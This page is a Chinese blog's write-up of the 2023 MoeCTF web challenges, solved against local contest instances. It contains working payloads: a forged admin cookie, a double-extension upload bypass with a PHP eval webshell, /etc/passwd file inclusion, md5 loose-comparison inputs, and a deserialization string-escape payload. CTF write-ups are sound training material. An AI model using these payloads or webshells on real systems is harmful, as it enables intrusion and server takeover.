
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=true"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());

    gtag('config', 'true');
  </script>
  <!-- End Google Analytics -->


  

  
  <script async src="https://hm.baidu.com/hm.js?true"></script>
  <script data-pjax>
    var _hmt = _hmt || [];
    _hmt.push(["_trackPageview", location.pathname]);
  </script>


  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.outdate = {"enable":true,"daysAgo":180,"message":"本文最后更新于 {time}，请注意文中内容可能已经发生变化。"};</script>
  
  
  <title>
    2023MoeCTF之web的wp |
    
    yyjccc的博客
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  <meta name="description" content="[2023 MoeCTF] WEB wp环境有问题，我开始还能用自己ip访问，后面突然不行了，这导致不能抓取本地的包，没关系照样做(^-^) http签到题一   第一眼还没看懂，这应该满足他的条件即可拿到flag 1和2,分别get和post传参， 3.修改Cookie为character为admin 4.添加字段X-Forward-For: 127.0.0.1 5.修改User-Agent内容">
<meta property="og:type" content="article">
<meta property="og:title" content="2023MoeCTF之web的wp">
<meta property="og:url" content="https://yyjccc.github.io/2023/09/12/2023MoeCTF%E4%B9%8Bweb%E7%9A%84wp/index.html">
<meta property="og:site_name" content="yyjccc的博客">
<meta property="og:description" content="[2023 MoeCTF] WEB wp环境有问题，我开始还能用自己ip访问，后面突然不行了，这导致不能抓取本地的包，没关系照样做(^-^) http签到题一   第一眼还没看懂，这应该满足他的条件即可拿到flag 1和2,分别get和post传参， 3.修改Cookie为character为admin 4.添加字段X-Forward-For: 127.0.0.1 5.修改User-Agent内容">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/7.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/8.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/9.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/10.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/11.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/12.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/15.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/16.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/17.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/18.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/19.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/1.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/2.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/3.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/4.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/5.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/6.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/13.png">
<meta property="og:image" content="https://yyjccc.github.io/img/9-12/14.png">
<meta property="article:published_time" content="2023-09-12T07:47:46.357Z">
<meta property="article:modified_time" content="2023-12-10T15:34:29.859Z">
<meta property="article:author" content="Yyjccc">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyjccc.github.io/img/9-12/7.png">
  
    <link rel="alternate" href="/atom.xml" title="yyjccc的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
    
      
<link rel="stylesheet" href="https://npm.webcache.cn/gitalk/dist/gitalk.css">

    
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

  <body>
    
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="2023MoeCTF之web的wp">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">2023MoeCTF之web的wp</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-2023MoeCTF之web的wp" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2023/09/12/2023MoeCTF%E4%B9%8Bweb%E7%9A%84wp/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2023-09-12T07:47:46.357Z" itemprop="datePublished">2023-09-12</time>
    <time style="display: none;" id="post-update-time">2023-12-10</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <blockquote id="outdate-blockquote" style="display: none;"><p></p></blockquote>
      
      
        <h1 id="2023-MoeCTF-WEB-wp"><a href="#2023-MoeCTF-WEB-wp" class="headerlink" title="[2023 MoeCTF] WEB wp"></a>[2023 MoeCTF] WEB wp</h1><p>环境有问题，我开始还能用自己ip访问，后面突然不行了，这导致不能抓取本地的包，没关系照样做(^-^)</p>
<h1 id="http"><a href="#http" class="headerlink" title="http"></a>http</h1><p>签到题一</p>
<img src="\img\9-12\7.png" height="300px">

<p>第一眼还没看懂，这应该满足他的条件即可拿到flag</p>
<p>1和2,分别get和post传参，</p>
<p>3.修改Cookie为character为admin</p>
<p>4.添加字段X-Forward-For: 127.0.0.1</p>
<p>5.修改User-Agent内容为MoeBrowser</p>
<img src="\img\9-12\8.png">



<h1 id="Web入门指北"><a href="#Web入门指北" class="headerlink" title="Web入门指北"></a>Web入门指北</h1><p>签到题二</p>
<p>解密：</p>
<figure class="highlight text"><table><tbody><tr><td class="code"><pre><span class="line">666c61673d6257396c5933526d6533637a62454e7662575666564739666257396c513152475831637959 6c396a61474673624756755a3055684958303 </span><br></pre></td></tr></tbody></table></figure>

<p>对密码不是很熟悉，但对这里应该只能是md5、base64、16进制</p>
<p>一看只能是16进制</p>
<p>进行16进制解码：<code>flag=bW9lY3Rme3czbENvbWVfVG9fbW9lQ1RGX1cyYl9jaGFsbGVuZ0UhIX0</code></p>
<p>这里面还加了一层base64,</p>
<p>进行解码：<code>moectf{w3lCome_To_moeCTF_W2b_challengE!!}</code></p>
<h1 id="彼岸的flag"><a href="#彼岸的flag" class="headerlink" title="彼岸的flag"></a>彼岸的flag</h1><p>签到题三</p>
<p>查看源代码搜索注释(&lt;!–)就行（藏得靠后…）</p>
<img src="\img\9-12\9.png">



<h1 id="Cookie"><a href="#Cookie" class="headerlink" title="Cookie"></a>Cookie</h1><p>根据他给出的api进行注册和登录，然后获取flag</p>
<img src="\img\9-12\10.png" height="300px">

<p>提示我们不是admin用户，拿到cookie,</p>
<p>进行base64解码，得到<code>{"username": "yyj", "password": "123456", "role": "user"}</code></p>
<p>修改为<code>{"username": "admin", "password": "123456", "role": "admin"}</code></p>
<p>再进行base64编码得到eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwYXNzd29yZCI6ICIxMjM0NTYiLCAicm9sZSI6ICJhZG1pbiJ9</p>
<p>替换Cookie中的token值，再访问flag，得到flag</p>
<figure class="highlight json"><table><tbody><tr><td class="code"><pre><span class="line"><span class="punctuation">{</span><span class="attr">"error"</span><span class="punctuation">:</span> <span class="string">"ok"</span><span class="punctuation">,</span> <span class="attr">"data"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="attr">"flag"</span><span class="punctuation">:</span> <span class="string">"moectf{cooKi3_is_d3licious_MA9iVff90SSJ!!M6Mrfu9ifxi9i!JGofMJ36D9cPMxro}"</span><span class="punctuation">}</span><span class="punctuation">}</span></span><br></pre></td></tr></tbody></table></figure>



<h1 id="gas-gas-gas"><a href="#gas-gas-gas" class="headerlink" title="gas!gas!gas!"></a>gas!gas!gas!</h1><p>多看了几眼，根据他给的说明，要正确提交正确的表单，</p>
<img src="/img/9-12/11.png">

<p>然后根据规则，编写python脚本，注意一下Cookie(session)问题，开始还没注意到</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line"><span class="comment">#默认post参数</span></span><br><span class="line">data={</span><br><span class="line">    <span class="string">"driver"</span>: <span class="string">"yyj"</span>,</span><br><span class="line"><span class="string">"steering_control"</span>: <span class="string">'0'</span>,</span><br><span class="line"><span class="string">"throttle"</span>: <span class="string">'2'</span></span><br><span class="line">}</span><br><span class="line"><span class="comment">#url</span></span><br><span class="line">url=<span class="string">'http://localhost:60713'</span></span><br><span class="line"><span class="comment">#默认cookie</span></span><br><span class="line">cookies={</span><br><span class="line">    <span class="string">'session'</span>: <span class="string">'.eJxtjdsKAiEURf_lPEuoo8fLr2TINKM0UQ6YJxqif0-GHntZsC_s_YZpLa2ut3hZSgMPgXSWOZDjeghkMKtA1qopUM68E6XrvjYD75Tu3OnkuNMEUsni3hTAYK7LM9W-uW3XLkt6tfh7A3_kTJ4Y1JXKDJ4zeLSxttiWewIv0CktLBp7QMlxsIrB30QJ8_kCkKs6Qw.ZQBNlg.s5GIQKXa8JudrZi3dGeeS_T699Q'</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#精确爬虫，也可以不搞</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">result</span>(<span class="params">res</span>):</span><br><span class="line">    html=BeautifulSoup(res,<span class="string">'lxml'</span>)</span><br><span class="line">    fl=html.body.div.string</span><br><span class="line">    <span class="keyword">if</span>(fl):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">'请求结果：'</span>,fl)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">'请求结果：'</span>,html.body.div)</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">setdata</span>(<span class="params">res,data</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="string">'向右'</span> <span class="keyword">in</span> res:</span><br><span class="line">        data[<span class="string">'steering_control'</span>]=<span class="string">'-1'</span></span><br><span class="line">    <span class="keyword">elif</span> <span class="string">'向左'</span> <span class="keyword">in</span> res:</span><br><span class="line">        data[<span class="string">'steering_control'</span>]=<span class="string">'1'</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">'其他'</span>)</span><br><span class="line">        data[<span class="string">'steering_control'</span>]=<span class="string">'0'</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'太小'</span> <span class="keyword">in</span> res:</span><br><span class="line">        data[<span class="string">'throttle'</span>]=<span class="string">'0'</span></span><br><span class="line">    <span class="keyword">elif</span> <span class="string">'太大'</span> <span class="keyword">in</span> res:</span><br><span class="line">        data[<span class="string">'throttle'</span>]=<span class="string">'2'</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">'其他'</span>)</span><br><span class="line">        data[<span class="string">'throttle'</span>]=<span class="string">'1'</span></span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'第'</span>+<span class="built_in">str</span>(i)+<span class="string">'次'</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'请求数据：'</span>,data)</span><br><span class="line">    res=requests.post(url=url,data=data,cookies=cookies)</span><br><span class="line">    fl=result(res.text)</span><br><span class="line">    <span class="keyword">if</span>(res.cookies):</span><br><span class="line">        cookies=requests.utils.dict_from_cookiejar(res.cookies)</span><br><span class="line">    data=setdata(fl,data=data)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">'moectf'</span> <span class="keyword">in</span> res.text:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>()</span><br></pre></td></tr></tbody></table></figure>

<p>跑一下就可以出flag</p>
<img src="/img/9-12/12.png">



<h1 id="moe图床"><a href="#moe图床" class="headerlink" title="moe图床"></a>moe图床</h1><p>经典文件上传处理</p>
<p>首页查看js源码，查看ajex，发现upload.php</p>
<img src="/img/9-12/15.png">

<p>进行访问，得到源码</p>
<img src="/img/9-12/16.png">

<p>对上传文件检查了文件类型，和文件名，关键$fileNameParts&nbsp;=&nbsp;explode(‘.’,&nbsp;$fileName); 将文件名变为数组后，$secondSegment&nbsp;=&nbsp;$fileNameParts[1]; </p>
<p>固定取下标为1</p>
<p>绕过：抓包，修改文件类型为image/png,修改文件名为test.png.php</p>
<p>这里我没抓包，我用的python脚本</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url =<span class="string">'http://localhost:55163/upload.php'</span></span><br><span class="line">file={</span><br><span class="line">    <span class="string">'file'</span>:(<span class="string">'test.png.php'</span> <span class="comment">#文件名</span></span><br><span class="line">            ,<span class="built_in">open</span>(<span class="string">"D:/phpstudy_pro/WWW/upload- picture/link.php"</span>,<span class="string">'rb'</span>)</span><br><span class="line">            ,<span class="string">'image/png'</span> <span class="comment">#文件类型</span></span><br><span class="line">            )</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line">res=requests.post(url,files=file)</span><br><span class="line"><span class="built_in">print</span>(res.text)</span><br></pre></td></tr></tbody></table></figure>

<p>上传一句话木马成功！</p>
<img src="/img/9-12/17.png">

<p>这里附上一句话木马（不看就好-*-*）</p>
<figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line"><span class="number">89504E47</span></span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> <span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line">@<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">'bb'</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>

<p>访问验证一下</p>
<img src="/img/9-12/18.png">

<p>用蚁剑一连，flag就在根目录</p>
<img src="/img/9-12/19.png">



<h1 id="meo图床"><a href="#meo图床" class="headerlink" title="meo图床"></a>meo图床</h1><p>文件上传先试下水，上传成功</p>
<img src="\img\9-12\1.png">

<p>查看一下图片</p>
<img src="\img\9-12\2.png">

<p>看这url,应该是用着文件包含，再试试，尝试包含/etc/passwd</p>
<img src="\img\9-12\3.png">

<p>这里只能显示图片，burp抓下包，这里我改成用python脚本(也一样)</p>
<img src="\img\9-12\4.png">

<p>ok,成功包含,试下flag</p>
<img src="\img\9-12\5.png">

<p>居然是个提示(…….),访问一下Fl3g_n0t_Here_dont_peek!!!!!.php</p>
<p>这里发现是PHP的md5弱比较,不多说了</p>
<p>最终payload</p>
<figure class="highlight text"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost:55371/Fl3g_n0t_Here_dont_peek!!!!!.php?param1=s878926199a&amp;param2=s214587387a</span><br></pre></td></tr></tbody></table></figure>

<img src="\img\9-12\6.png">



<h1 id="夺命十三枪"><a href="#夺命十三枪" class="headerlink" title="夺命十三枪"></a>夺命十三枪</h1><p>典型的PHP反序列化中的字符串逃逸题目</p>
<p>访问它包含的文件Hanxin.exe.php ，得到源码，</p>
<p>对两个页面进行代码审计，发现，关键是反序列化后Spear_Owner 属性为MaoLei 就可获得flag</p>
<p>而我们可以通过get传参给Chant 属性赋值，恰巧他对序列化的字符串进行了如下的字符串替换</p>
<img src="/img/9-12/13.png">

<p>所以先写出要逃逸的字符串：	</p>
<figure class="highlight text"><table><tbody><tr><td class="code"><pre><span class="line">";s:11:"Spear_Owner";s:6:"MaoLei";}</span><br></pre></td></tr></tbody></table></figure>

<p>然后要逃逸的字符总数为35个，</p>
<p>发现：di_qi_qiang 替换后增加5个字符，di_jiu_qiang 替换后增加20个字符</p>
<p>因此加入di_qi_qiang 3个，di_jiu_qiang个；序列化后替换后会恰好增加35个字符，然后后面的字符就能逃逸出去，进行反序列化到}结束，就此覆盖了他构造函数对Spear_Owner 赋值，拿到flag</p>
<p>最终payload</p>
<figure class="highlight text"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost:53192/?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_jiu_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}</span><br></pre></td></tr></tbody></table></figure>

<img src="/img/9-12/14.png">




      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://blog.yyjccc.xyz/images/cover/2.jpg" data-sizes="auto" alt="2023SHCTF之web的wp" class="lazyload">
          
        
        <a href="/2023/10/03/2023SHCTF%E4%B9%8Bweb%E7%9A%84wp/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            2023SHCTF之web的wp
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://blog.yyjccc.xyz/images/cover/4.jpg" data-sizes="auto" alt="入门flask框架" class="lazyload">
        
      
      <a href="/2023/08/28/%E5%85%A5%E9%97%A8flask%E6%A1%86%E6%9E%B6/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          入门flask框架
        
      </h3>
    </div>
    
  </nav>


  
</article>




  <div id="comments" class="gtcomment"></div>



</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2023-MoeCTF-WEB-wp"><span class="toc-number">1.</span> <span class="toc-text">[2023 MoeCTF] WEB wp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#http"><span class="toc-number">2.</span> <span class="toc-text">http</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web%E5%85%A5%E9%97%A8%E6%8C%87%E5%8C%97"><span class="toc-number">3.</span> <span class="toc-text">Web入门指北</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BD%BC%E5%B2%B8%E7%9A%84flag"><span class="toc-number">4.</span> <span class="toc-text">彼岸的flag</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Cookie"><span class="toc-number">5.</span> <span class="toc-text">Cookie</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#gas-gas-gas"><span class="toc-number">6.</span> <span class="toc-text">gas!gas!gas!</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#moe%E5%9B%BE%E5%BA%8A"><span class="toc-number">7.</span> <span class="toc-text">moe图床</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#meo%E5%9B%BE%E5%BA%8A"><span class="toc-number">8.</span> <span class="toc-text">meo图床</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%BA%E5%91%BD%E5%8D%81%E4%B8%89%E6%9E%AA"><span class="toc-number">9.</span> <span class="toc-text">夺命十三枪</span></a></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">45</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">69</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2023-2024
      <span class="footer-info-sep"></span>
      Yyjccc
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        154.6k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        10:30
      </div>
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2023-MoeCTF-WEB-wp"><span class="toc-number">1.</span> <span class="toc-text">[2023 MoeCTF] WEB wp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#http"><span class="toc-number">2.</span> <span class="toc-text">http</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web%E5%85%A5%E9%97%A8%E6%8C%87%E5%8C%97"><span class="toc-number">3.</span> <span class="toc-text">Web入门指北</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BD%BC%E5%B2%B8%E7%9A%84flag"><span class="toc-number">4.</span> <span class="toc-text">彼岸的flag</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Cookie"><span class="toc-number">5.</span> <span class="toc-text">Cookie</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#gas-gas-gas"><span class="toc-number">6.</span> <span class="toc-text">gas!gas!gas!</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#moe%E5%9B%BE%E5%BA%8A"><span class="toc-number">7.</span> <span class="toc-text">moe图床</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#meo%E5%9B%BE%E5%BA%8A"><span class="toc-number">8.</span> <span class="toc-text">meo图床</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%BA%E5%91%BD%E5%8D%81%E4%B8%89%E6%9E%AA"><span class="toc-number">9.</span> <span class="toc-text">夺命十三枪</span></a></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">45</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
